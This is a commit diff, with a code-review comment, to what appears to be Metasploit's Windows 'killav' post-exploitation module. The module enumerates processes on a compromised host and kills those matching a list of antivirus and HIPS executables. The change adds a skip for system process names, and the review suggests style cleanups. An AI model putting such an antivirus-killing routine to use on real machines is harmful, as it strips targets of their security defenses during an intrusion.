
Commit 663bcbe

committed
Avoid checking these system process names
1 parent 64a91a5 commit 663bcbe


1 file changed

+8
-0
lines changed

1 file changed

+8
-0
lines changed

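--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -26,6 +26,13 @@ def initialize(info={})
 ))
 end
 
+def skip_process_name?(process_name)
+[
+'[system process]',
+'system'
+].include?(process_name)
+end
+
 def run
 avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
 'av_hips_executables.txt')).strip
@@ -34,6 +41,7 @@ def run
 processes_found = 0
 processes_killed = 0
 client.sys.process.get_processes().each do |x|
+next if skip_process_name?(x['name'].downcase)
 vprint_status("Checking #{x['name'].downcase} ...")
 if avs.include?(x['name'].downcase)
 processes_found += 1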
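Review bot: The added guard in `run` evaluates `x['name'].downcase` a third time per process, next to the existing `vprint_status` and `avs.include?` lines; binding it once with `name = x['name'].downcase` and then `next if skip_process_name?(name)` keeps the three uses in sync. `skip_process_name?` rebuilds its two-element array on every call, so a frozen constant such as `SKIP_PROCESS_NAMES = ['[system process]', 'system'].freeze` would read more clearly. The method is also undocumented: a short comment should say why these two entries are excluded (the commit title only says to avoid checking them) and that the argument must already be lowercased, since the comparison is against lowercase literals. The body of `run` continues outside the hunk.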
